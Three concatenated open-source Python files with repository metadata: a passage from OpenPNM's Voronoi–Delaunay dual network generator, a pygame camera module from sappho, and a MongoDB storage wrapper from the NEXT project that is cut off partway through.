        A dictionary containing 'node.coords' and 'edge.conns'
    vor : Voronoi object
        The Voronoi tessellation object produced by ``scipy.spatial.Voronoi``
    tri : Delaunay object
        The Delaunay triangulation object produced ``scipy.spatial.Delaunay``

    """
    # Generate a set of base points if scalar was given
    points = tools.parse_points(points=points, shape=shape, reflect=reflect)
    # Generate mask to remove any dims with all 0's
    mask = ~np.all(points == 0, axis=0)

    # Perform tessellations
    vor = sptl.Voronoi(points=points[:, mask])
    tri = sptl.Delaunay(points=points[:, mask])

    # Combine points: Delaunay (base) points first, Voronoi vertices after
    pts_all = np.vstack((vor.points, vor.vertices))
    Nall = np.shape(pts_all)[0]

    # Create adjacency matrix in lil format for quick construction
    am = sprs.lil_matrix((Nall, Nall))
    for ridge in vor.ridge_dict.keys():
        # Make Delaunay-to-Delaunay connections
        for i in ridge:
            am.rows[i].extend([ridge[0], ridge[1]])
        # Get Voronoi vertices for current ridge
        row = vor.ridge_dict[ridge].copy()
        # Index Voronoi vertex numbers by number of Delaunay points
        # (entries of -1 mark vertices at infinity and are dropped)
        row = [i + vor.npoints for i in row if i > -1]
        # Make Voronoi-to-Delaunay connections
        for i in ridge:
            am.rows[i].extend(row)
        # Make Voronoi-to-Voronoi connections (close the vertex ring)
        row.append(row[0])
        for i in range(len(row)-1):
            am.rows[row[i]].append(row[i+1])

    # Finalize adjacency matrix by assigning data values
    am.data = am.rows  # Values don't matter, only shape, so use 'rows'
    # Convert to COO format for direct access to row and col
    am = am.tocoo()
    # Extract rows and cols
    conns = np.vstack((am.row, am.col)).T
    # Convert to sanitized adjacency matrix
    am = conns_to_am(conns)
    # Finally, retrieve conns back from am
    conns = np.vstack((am.row, am.col)).T

    # Convert coords to 3D if necessary
    # Rounding is crucial since some voronoi verts end up outside domain
    pts_all = np.around(pts_all, decimals=10)
    if mask.sum() < 3:
        coords = np.zeros([pts_all.shape[0], 3], dtype=float)
        coords[:, mask] = pts_all
    else:
        coords = pts_all

    # Assign coords and conns to network dict
    network = {}
    network[node_prefix+'.coords'] = coords
    network[edge_prefix+'.conns'] = conns

    n_nodes = coords.shape[0]
    n_edges = conns.shape[0]

    # Label all pores and throats by type
    network[node_prefix+'.delaunay'] = np.zeros(n_nodes, dtype=bool)
    network[node_prefix+'.delaunay'][0:vor.npoints] = True
    network[node_prefix+'.voronoi'] = np.zeros(n_nodes, dtype=bool)
    network[node_prefix+'.voronoi'][vor.npoints:] = True
    # Label throats between Delaunay pores
    network[edge_prefix+'.delaunay'] = np.zeros(n_edges, dtype=bool)
    Ts = np.all(network[edge_prefix+'.conns'] < vor.npoints, axis=1)
    network[edge_prefix+'.delaunay'][Ts] = True
    # Label throats between Voronoi pores
    network[edge_prefix+'.voronoi'] = np.zeros(n_edges, dtype=bool)
    Ts = np.all(network[edge_prefix+'.conns'] >= vor.npoints, axis=1)
    network[edge_prefix+'.voronoi'][Ts] = True
    # Label throats connecting a Delaunay and a Voronoi pore
    Ts = np.sum(network[node_prefix+'.delaunay'][conns].astype(int), axis=1) == 1
    network[edge_prefix+'.interconnect'] = Ts

    # Identify and trim nodes outside the domain if requested
    if trim:
        inside_all = ~isoutside(network, shape=shape)
        inside_delaunay = inside_all*network[node_prefix+'.delaunay']
        outside_delaunay = (~inside_all)*network[node_prefix+'.delaunay']
        neighbors = find_neighbor_nodes(network=network,
                                        inds=np.where(inside_delaunay)[0],
                                        include_input=True)
        # NOTE(review): the boolean `trim` argument is shadowed here by
        # the trim *mask*; intentional but easy to misread.
        trim = np.ones([network[node_prefix+'.coords'].shape[0], ], dtype=bool)
        trim[neighbors] = False  # Keep all neighbors to internal delaunay nodes
        trim[outside_delaunay] = True  # Re-add external delaunay nodes to trim
        network = trim_nodes(network=network, inds=np.where(trim)[0])

    return network, vor, tri
if __name__ == "__main__":
    # Visual smoke test: build a dual network from 1000 reflected
    # points in a unit domain and plot its edges.
    from openpnm._skgraph.visualization import plot_edges

    # dvd, vor, tri = voronoi_delaunay_dual(points=50, shape=[1, 0, 1])
    # print(dvd.keys())
    # print(dvd['node.coords'].shape)
    # print(dvd['edge.conns'].shape)
    # dvd, vor, tri = voronoi_delaunay_dual(points=50, shape=[1, 0, 1], trim=True)
    # print(dvd.keys())
    # print(dvd['node.coords'].shape)
    # print(dvd['edge.conns'].shape)
    shape = [1]
    pts = tools.parse_points(points=1000, shape=shape, reflect=True)
    vn, vor, tri = voronoi_delaunay_dual(points=pts, shape=shape, trim=True)
    plot_edges(vn)
| {
"content_hash": "bd0b0bcf0d03d9a0a7e5292817540094",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 82,
"avg_line_length": 40.33566433566433,
"alnum_prop": 0.6437239944521498,
"repo_name": "PMEAL/OpenPNM",
"id": "fac3c1fd1bfff3b9b3b1cc9f2c4316374474baa8",
"size": "5768",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "openpnm/_skgraph/generators/_voronoi_delaunay_dual.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "375"
},
{
"name": "Python",
"bytes": "1437146"
}
],
"symlink_target": ""
} |
"""Camera control on a surface.
Camera is just a pygame surface, so treat it as such!
A camera allows you to have a viewport which is smaller than the size
of the surface you're hoping to pan that viewport around on. Think
about looking at a big painting through a paper towel tube.
Cameras have an output resolution it scales its viewport to, plus a
behavior which governs how a Camera pans on its associated surface.
"""
import pygame
class CameraOutOfBounds(Exception):
    """The camera's view rectangle extends beyond the surface the
    camera is looking at, so a valid subsurface cannot be made.

    Attributes:
        camera (Camera): The camera whose view went out of bounds.

    """

    def __init__(self, camera):
        self.camera = camera
        super(CameraOutOfBounds, self).__init__(camera)
class CameraBehavior(object):
    """Base policy describing how a camera pans across its surface.

    This default policy simply pins the focal rectangle to the
    top-left corner of the camera's view. Subclasses should override
    :meth:`move` to implement other panning rules (boundary handling,
    following a character, and so on).

    """

    @staticmethod
    def move(camera, focal_rectangle):
        """Pan so the focal rectangle sits at the view's top-left.

        This method should be overridden in a child class.

        Arguments:
            camera (sappho.camera.Camera): Associated Sappho camera
                object to control.
            focal_rectangle (pygame.Rect): Rectangle which is used to
                possibly adjust camera position.

        """
        camera.view_rect.topleft = focal_rectangle.topleft
class CameraCenterBehavior(CameraBehavior):
    """Behavior which keeps the focal rectangle centered in the
    camera's view whenever possible.

    The view is clamped to the source surface's bounds, so this
    behavior never causes Camera.update_state() to raise
    CameraOutOfBounds.

    """

    @staticmethod
    def move(camera, focal_rectangle):
        """Center the camera's view on the focal rectangle,
        clamped to the source surface's edges.

        Arguments:
            camera (sappho.camera.Camera):
            focal_rectangle (pygame.Rect): Rectangle which is
                used to possibly adjust camera position.

        """

        view = camera.view_rect.copy()
        view.center = focal_rectangle.center

        # Clamp each edge so the centered view never leaves the
        # environment's dimensions (don't go off the map!).
        if view.left < 0:
            view.left = 0

        if view.top < 0:
            view.top = 0

        if view.bottom > camera.source_resolution[1]:
            view.bottom = camera.source_resolution[1]

        if view.right > camera.source_resolution[0]:
            view.right = camera.source_resolution[0]

        camera.view_rect = view
class Camera(pygame.surface.Surface):
    """Surface acting as a scrollable view onto a larger source
    surface, with optional scaling to an output resolution.

    Attributes:
        source_surface (pygame.Surface): The environment being
            portrayed; anything beyond its bounds is never on
            camera.
        source_resolution (tuple[int, int]): Maximum size of the
            environment being portrayed.  For a map with many
            inconsistently sized layers, this is the size of all
            layers flattened onto a single new layer.
        output_resolution (tuple[int, int]): Resolution the view
            of the surface is scaled up to.
        view_rect (pygame.Rect): Area of this camera's view; used
            to create the subsurface which is scaled to
            output_resolution and blit to self/camera.
        behavior (CameraBehavior): The behavior this Camera uses
            to control movement.

    """

    def __init__(self, source_resolution, output_resolution,
                 view_resolution, behavior=None):
        """Create a Camera!

        Arguments:
            source_resolution (tuple[int, int]): Size of the
                source surface created for this camera.
            output_resolution (tuple[int, int]): Size this
                camera surface renders at.
            view_resolution (tuple[int, int]): Used to create
                the view_rect attribute.
            behavior (CameraBehavior|None): Panning behavior;
                defaults to the top-left CameraBehavior.

        """

        super(Camera, self).__init__(output_resolution)
        self.source_resolution = source_resolution
        self.output_resolution = output_resolution
        self.source_surface = pygame.surface.Surface(source_resolution,
                                                     pygame.SRCALPHA)
        self.view_rect = pygame.Rect((0, 0), view_resolution)
        self.behavior = behavior or CameraBehavior()

    def update_state(self, timedelta):
        """Redraw this camera from the current scroll position.

        The view described by view_rect is taken as a subsurface
        of the source surface, scaled to output_resolution, and
        blit to this camera (which is a surface, itself!).

        Arguments:
            timedelta (None): Unused; included as an argument
                for consistency.

        Raises:
            CameraOutOfBounds: If view_rect exceeds the bounds
                of the source surface.

        """

        try:
            view = self.source_surface.subsurface(self.view_rect)
        except ValueError:
            raise CameraOutOfBounds(self)

        scaled = pygame.transform.scale(view, self.output_resolution)

        # Blit the scaled view onto this camera surface.
        super(Camera, self).blit(scaled, (0, 0))

    def scroll_to(self, focal_rectangle):
        """Scroll to the focal rectangle using the current
        behavior.

        Parameters:
            focal_rectangle (pygame.Rect): Rectangle to possibly
                update the view position to, via the camera's
                current behavior.

        """

        self.behavior.move(self, focal_rectangle)
| {
"content_hash": "fe5c8609b194785b169541a00798e92f",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 74,
"avg_line_length": 32.74193548387097,
"alnum_prop": 0.6394088669950739,
"repo_name": "lillian-lemmer/sappho",
"id": "8443b1485ffc22cdffc296bda91e0de05598a36d",
"size": "6090",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "sappho/camera.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "47553"
},
{
"name": "Shell",
"bytes": "113"
}
],
"symlink_target": ""
} |
"""
Perm Store
author: Kevin Jamieson, kevin.g.jamieson@gmail.com
last updated: 12/31/2014
Persistent storage solution. Database hierarchy is organized as: ::\n
PermStore[database_id][bucket_id][doc_uid] = {key1:value1,key2:value2,...}
Dependencies: next.constants to determine location of mongoDB server
Some common functions
###############################
Initialization::\n
db = PermStore()
Database functions::\n
exists,didSucceed,message = db.exists(database_id,bucket_id,doc_uid,key)
value,didSucceed,message = db.get(database_id,bucket_id,doc_uid,key)
doc,didSucceed,message = db.getDoc(database_id,bucket_id,doc_uid)
docs,didSucceed,message = db.getDocsByPattern(database_id,bucket_id,filter_dict)
didSucceed,message = db.set(database_id,bucket_id,doc_uid,key,value)
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,doc)
didSucceed,message = db.delete(database_id,bucket_id,doc_uid,key)
didSucceed,message = db.deleteDoc(database_id,bucket_id,doc_uid)
didSucceed,message = db.deleteDocsByPattern(database_id,bucket_id,filter_dict)
didSucceed,message = db.deleteBucket(database_id,bucket_id)
didSucceed,message = db.deleteDatabase(database_id)
didSucceed,message = db.deleteAll()
Database inspection ::\n
docNames,didSucceed,message = db.getDocNames(database_id,bucket_id)
bucketNames,didSucceed,message = db.getBucketNames(database_id)
databaseNames,didSucceed,message = db.getDatabaseNames()
Some example usage
###############################
Let's first initialize the database ::\n
from next.database.PermStore import PermStore
db = PermStore()
And let's assume that the database is empty, which we can enforce by deleting everything ::\n
didSucceed,message = db.deleteAll()
Building up a document one key at a time ::\n
database_id = 'things'
bucket_id = 'animals'
doc_uid = 'cat'
didSucceed,message = db.set(database_id,bucket_id,doc_uid,'color','black')
didSucceed,message = db.set(database_id,bucket_id,doc_uid,'num_legs',4)
didSucceed,message = db.set(database_id,bucket_id,doc_uid,'age',7.5)
Inserting a document ::\n
database_id = 'things'
bucket_id = 'animals'
doc_uid = 'dog'
doc = {'color':'brown','num_legs':4,'age':9.5}
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,doc)
doc_uid = 'human'
doc = {'color':'tan','num_legs':2,'age':28}
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,doc)
Retrieving values ::\n
value,didSucceed,message = db.get('things','animals','dog','age')
print value
>>> 9.5
Retrieving docs ::\n
doc,didSucceed,message = db.getDoc('things','animals','cat')
print doc
>>> {u'color': u'black', u'age': 7.5, u'_id': u'cat', u'num_legs': 4}
doc,didSucceed,message = db.getDoc('things','animals','dog')
print doc
>>> {u'color': u'brown', u'age': 9.5, u'_id': u'dog', u'num_legs': 4}
Advanced doc retrieval ::\n
docs,didSucceed,message = db.getDocsByPattern('things','animals',{})
print docs
>>> [{u'color': u'black', u'age': 7.5, u'_id': 'cat', u'num_legs': 4}, {u'color': u'brown', u'age': 9.5, u'_id': 'dog', u'num_legs': 4}, {u'color': u'tan', u'age': 28, u'_id': 'human', u'num_legs': 2}]
docs,didSucceed,message = db.getDocsByPattern('things','animals',{'num_legs':4})
>>> [{u'color': u'black', u'age': 7.5, u'_id': 'cat', u'num_legs': 4}, {u'color': u'brown', u'age': 9.5, u'_id': 'dog', u'num_legs': 4}]
docs,didSucceed,message = db.getDocsByPattern('things','animals',{'age':{ '$gte':8,'$lt':10} })
>>> [{u'color': u'brown', u'age': 9.5, u'_id': 'dog', u'num_legs': 4}]
docs,didSucceed,message = db.getDocsByPattern('things','animals',{'age':{ '$gte':8 }, 'num_legs':2 })
>>> [{u'color': u'tan', u'age': 28, u'_id': 'human', u'num_legs': 2}]
Doc retrieval with time ::\n
from datetime import datetime,timedelta
t_0 = datetime.now()
t_1 = t_0 + timedelta(0,30)
t_2 = t_1 + timedelta(0,15)
t_3 = t_0 + timedelta(0,55)
# (if doc_uid=None, one is automatically generated)
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'a0jd103b2r','timestamp':t_0})
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'w8dh28232f','timestamp':t_1})
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'89yf9hgfwe','timestamp':t_2})
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'edhe2dqw9d','timestamp':t_3})
ts = t_1 - timedelta(0,1)
te = t_2 + timedelta(0,1)
docs,didSucceed,message = db.getDocsByPattern('users','keys',{'timestamp':{ '$gte':ts,'$lte':te } })
print docs
>>> [{u'timestamp': '2015-01-23 10:57:14.779000', u'_id': '54c2996c319da682ebb17576', u'user_id': u'sd89w3hr292r', u'key': u'w8dh28232f'}, {u'timestamp': '2015-01-23 10:57:29.779000', u'_id': '54c2996c319da682ebb17577', u'user_id': u'sd89w3hr292r', u'key': u'89yf9hgfwe'}]
"""
from pymongo import MongoClient
import next.constants as constants
from bson.binary import Binary
import cPickle
import traceback
from datetime import datetime
class PermStore(object):
"""
Acts as API to permanent store that can be passed around. Implements MongoDB
    Attributes:
client : MongoDB client
"""
    def __init__(self):
        # Connect immediately using the host/port from next.constants.
        self.client = MongoClient(constants.MONGODB_HOST, constants.MONGODB_PORT)
        # Fire-and-forget writes were once enabled here; left disabled.
        # self.client.write_concern = {'w':0}
def __del__(self):
try:
if self.client!=None:
self.client.close()
except:
pass
def connectToMongoServer(self):
try:
self.client = MongoClient(constants.MONGODB_HOST, constants.MONGODB_PORT)
if self.assertConnection():
# This makes it so the write signal is fired off and and does not wait for acknowledgment
# self.client.write_concern = {'w':0}
return True,''
else:
raise
error = 'Failed to connect to Mongodb server at %s:%s' % (constants.MONGODB_HOST,constants.MONGODB_PORT)
return False,error
return didSuccessfullyConnect,''
except:
return False,'Failed to connect to MongoDB Server'
def assertConnection(self):
"""
Checks that MongoDB is running
Inputs:
None
Outputs:
(boolean) isConnected
Usage: ::\n
db.assertConnection()
"""
try:
return bool(self.client.admin.command('ping')['ok'])
except:
return False
def makeProperDatabaseFormat(self,input_val):
"""
Example of usage: ::\n
>>> from next.database.PermStore import PermStore
>>> db = PermStore()
>>> import numpy
>>> X = numpy.zeros(3)
>>> from datetime import datetime
>>> timestamp = datetime.now()
>>> input = {'animal':'dog','age':4.5,'x':X,'time':timestamp}
>>> db_input = db.makeProperDatabaseFormat(input)
>>> db_input
{'x': Binary('\x80\x02cnumpy.core.multiarray\n_reconstruct\nq\x01cnumpy\nndarray\nq\x02K\x00\x85U\x01b\x87Rq\x03(K\x01K\x03\x85cnumpy\ndtype\nq\x04U\x02f8K\x00K\x01\x87Rq\x05(K\x03U\x01<NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tb\x89U\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00tb.', 0), 'age': 4.5, 'animal': 'dog', 'time': datetime.datetime(2015, 1, 23, 10, 32, 28, 770190)}
>>> db_output = db.undoDatabaseFormat(db_input)
>>> db_output
{'x': array([ 0., 0., 0.]), 'age': 4.5, 'animal': 'dog', 'time': datetime.datetime(2015, 1, 23, 10, 32, 28, 770190)}
>>> input
{'x': array([ 0., 0., 0.]), 'age': 4.5, 'animal': 'dog', 'time': datetime.datetime(2015, 1, 23, 10, 32, 28, 770190)}
"""
if isinstance(input_val,dict):
for key in input_val:
input_val[key] = self.makeProperDatabaseFormat(input_val[key])
elif isinstance(input_val,list):
for idx in range(len(input_val)):
input_val[idx] = self.makeProperDatabaseFormat(input_val[idx])
elif isinstance(input_val, basestring):
pass
elif isinstance(input_val, (int, long, float) ):
pass
elif isinstance(input_val, datetime ):
pass
else:
# pickle value so we can handle any python type
pickled_input = cPickle.dumps(input_val, protocol=2)
input_val = Binary(pickled_input)
return input_val
def undoDatabaseFormat(self,input_val):
if isinstance(input_val,dict):
for key in input_val:
input_val[key] = self.undoDatabaseFormat(input_val[key])
elif isinstance(input_val,list):
for idx in range(len(input_val)):
input_val[idx] = self.undoDatabaseFormat(input_val[idx])
elif isinstance(input_val, Binary):
input_val = cPickle.loads(input_val)
return input_val
def get_index_information(self,database_id,bucket_id):
"""
Returns the description of all the indexes on the bucket
"""
info = self.client[database_id][bucket_id].index_information()
return info,True,''
def create_index(self,database_id,bucket_id,index_dict):
"""
Creates an index on the bucket defined by the keys in index_dict
self.client[database_id][bucket_id].create_index( {'num_eyes':1} )
"""
try:
index_list = []
for key in index_dict:
index_list.append( (key,index_dict[key]) )
message = self.client[database_id][bucket_id].create_index( index_list )
return True,message
except:
return False,'unknown error'
def drop_index(self,database_id,bucket_id,index_name):
"""
Deletes the index named index_name defined over the bucket_id
Inputs:
(string) database_id, (string) index_name
Outputs:
(bool) didSucceed, (string) message
"""
message = self.client[database_id][bucket_id].create_index( index_list )
return True,message
def drop_all_indexes(self,database_id,bucket_id):
"""
Deletes the index named index_name defined over the bucket_id
Inputs:
(string) database_id, (string) index_name
Outputs:
(bool) didSucceed, (string) message
"""
message = self.client[database_id][bucket_id].drop_indexes()
return True,message
def exists(self,database_id,bucket_id,doc_uid,key):
"""
Check existence of key
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(bool) exists, (bool) didSucceed, (string) message
Usage: ::\n
exists,didSucceed,message = db.exists(database_id,bucket_id,doc_uid,key)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
doc = self.client[database_id][bucket_id].find_one({"_id":doc_uid,key: { '$exists': True }})
key_exists = (doc!=None)
return key_exists,True,''
except:
error = "MongoDB.exists Failed with unknown exception"
return None,False,error
def get(self,database_id,bucket_id,doc_uid,key):
"""
Get a value corresponding to key, returns None if no key exists
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(string) value, (bool) didSucceed, (string) message
Usage: ::\n
value,didSucceed,message = db.get(database_id,bucket_id,doc_uid,key)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
doc = self.client[database_id][bucket_id].find_one({"_id":doc_uid,key: { '$exists': True }})
if doc == None:
message = 'MongoDB.get Key '+bucket_id+'.'+doc_uid+'.'+key+' does not exist'
return None,True,message
value = doc[key]
return_value = self.undoDatabaseFormat(value)
return return_value,True,'From MongoDB'
except:
return None,False,'MongoDB.get Failed with unknown exception'
def getDoc(self,database_id,bucket_id,doc_uid):
"""
get a doc (dictionary of string values) corresponding to a doc_uid with {"doc_uid":doc_uid} (if none, returns None)
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid
Outputs:
({ (string) key: (string) value, ... }) doc, (bool) didSucceed, (string) message
Usage: ::\n
doc,didSucceed,message = db.getDoc(database_id,bucket_id,doc_uid)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
doc = self.client[database_id][bucket_id].find_one({"_id":doc_uid})
return_doc = self.undoDatabaseFormat(doc)
return return_doc,True,''
except:
raise
error = "MongoDB.getDoc Failed with unknown exception"
return None,False,error
def getDocsByPattern(self,database_id,bucket_id,filter_dict):
"""
get all docs that contain {key1:value1,...} according to filter dict (if none, returns None)
Inputs:
(string) database_id, (string) bucket_id, (dict of key ,value strings)
Outputs:
({ (string) key: (string) value, ... }) docs, (bool) didSucceed, (string) message
Usage: ::\n
docs,didSucceed,message = db.getDocsByPattern(database_id,bucket_id,filter_dict)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
docs_iterator = self.client[database_id][bucket_id].find( filter_dict )
docs = []
for doc in docs_iterator:
doc = self.undoDatabaseFormat(doc)
try:
doc['_id'] = str(doc['_id'])
except:
pass
try:
doc['timestamp'] = str(doc['timestamp'])
except:
pass
docs.append(doc)
return docs,True,''
except:
error = "MongoDB.getDocs Failed with unknown exception"
return None,False,error
def increment(self,database_id,bucket_id,doc_uid,key,value):
"""
increments a key by amount value. If key does not exist, sets {key:value}
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (int) value
Outputs:
(int) new_value, (bool) didSucceed, (string) message
Usage: ::\n
new_value,didSucceed,message = db.increment(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
new_doc = self.client[database_id][bucket_id].find_and_modify(query={"_id":doc_uid} , update={ '$inc': {key:value} },upsert = True,new=True )
new_value = new_doc[key]
return new_value,True,'From Mongo'
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def increment_many(self,database_id,bucket_id,doc_uid,key_value_dict):
"""
increments a key by amount value. If key does not exist, sets {key:value}
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, ({(str)key1:(float)value1,(int)key2:(float) value2}) key_value_dict
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.increment_many(database_id,bucket_id,doc_uid,key_value_dict)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
self.client[database_id][bucket_id].update_one({"_id":doc_uid},{ '$inc': key_value_dict },upsert = True)
return True,'From Mongo'
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def get_list(self,database_id,bucket_id,doc_uid,key):
"""
gets saved by key. If key does not exist, returns None
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(list) list_value, (bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.get_list(database_id,bucket_id,doc_uid,key,value)
"""
return self.get(database_id,bucket_id,doc_uid,key)
def append_list(self,database_id,bucket_id,doc_uid,key,value):
"""
appends value to list saved by key. If key does not exist, sets {key:value}
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (int) value
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.set(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
value = self.makeProperDatabaseFormat(value)
message = self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$push': {key:value} },upsert = True )
return True,message
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def set_list(self,database_id,bucket_id,doc_uid,key,value_list):
"""
sets a list to {key,value_list} (if already exists, replaces)
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (list) value_list
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.set_list(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
value_list = self.makeProperDatabaseFormat(value_list)
self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$unset': {key: '' } },upsert = True )
self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$push': {key: { '$each': value_list } } },upsert = True )
return True,''
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def set(self,database_id,bucket_id,doc_uid,key,value):
"""
sets a {key,value} (if already exists, replaces)
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (string) value
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.set(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
value = self.makeProperDatabaseFormat(value)
message = self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$set': {key:value} },upsert = True )
return True,''
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def setDoc(self,database_id,bucket_id,doc_uid,doc):
"""
set a doc (dictionary of string values). If doc_uid==None, uid automatically assigned
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, ({ (string) key: (string) value, ... }) doc
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
if doc_uid != None:
doc['_id'] = doc_uid
doc = self.makeProperDatabaseFormat(doc)
write_id = self.client[database_id][bucket_id].insert(doc)
return True,''
except:
error = "MongoDB.insert Failed with unknown exception"
return False,error
def delete(self,database_id,bucket_id,doc_uid,key):
"""
deletes {key:value} associated with given key
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.delete(database_id,bucket_id,doc_uid,key)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$unset': {key:1} })
return True,"MongoDB.delete"
except:
error = "MongoDB.deleteBucket Failed with unknown exception"
return False,error
def deleteDoc(self,database_id,bucket_id,doc_uid):
"""
deletes doc associated with given doc_uid
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteDoc(database_id,bucket_id,doc_uid)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client[database_id][bucket_id].remove( {'_id':doc_uid} )
return True,''
except:
error = "MongoDB.deleteBucket Failed with unknown exception"
return False,error
def deleteDocsByPattern(self,database_id,bucket_id,filter_dict):
"""
delete all docs that contain {key1:value1,...} according to filter dict (if none, returns None)
Inputs:
(string) database_id, (string) bucket_id, (dict of key,value strings)
Outputs:
({ (string) key: (string) value, ... }) docs, (bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteDocsByPattern(database_id,bucket_id,filter_dict)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
dict_return = self.client[database_id][bucket_id].delete_one( filter_dict )
return True,str(dict_return)
except Exception, err:
error = traceback.format_exc()
return False,error
def deleteBucket(self,database_id,bucket_id):
"""
deletes bucket (and all docs in it) associated with given bucket_id
Inputs:
(string) database_id, (string) bucket_id
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteBucket(database_id,bucket_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client[database_id][bucket_id].drop()
return True,''
except:
error = "MongoDB.deleteBucket Failed with unknown exception"
return False,error
def deleteDatabase(self,database_id):
"""
deletes database (and all docs in it) associated with given bucket_id
Inputs:
(string) database_id
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteDatabase(database_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client.drop_database(database_id)
return True,''
except:
error = "MongoDB.deleteDatabase Failed with unknown exception"
return False,error
def deleteAll(self):
"""
delete all databases (i.e. everything)
Inputs:
None
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteAll()
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
db_list = self.client.database_names()
for database_id in db_list:
if (database_id != 'local') and (database_id != 'admin'):
didSucceed,message = self.deleteDatabase(database_id)
return True,''
except:
error = "MongoDB.deleteDatabase Failed with unknown exception"
return False,error
def getDocNames(self,database_id,bucket_id):
"""
get list of doc_uids correspding to all the docs in the bucket corresponding to the given bucket_id
Inputs:
(string) database_id, (string) bucket_id
Outputs:
([(string) doc_uid, ... ]) docNames, (bool) didSucceed, (string) message
Usage: ::\n
docNames,didSucceed,message = db.getDocNames(database_id,bucket_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
docs_iterator = self.client[database_id][bucket_id].find()
doc_names = [doc['_id'] for doc in docs_iterator]
return doc_names,True,''
except:
error = "MongoDB.getDocNames Failed with unknown exception"
return None,False,error
def getBucketNames(self,database_id):
"""
get list of bucket_ids for corresponding database_id
Inputs:
(string) database_id
Outputs:
([(string) bucket_id, ... ]) docNames, (bool) didSucceed, (string) message
Usage: ::\n
bucketNames,didSucceed,message = db.getBucketNames(database_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
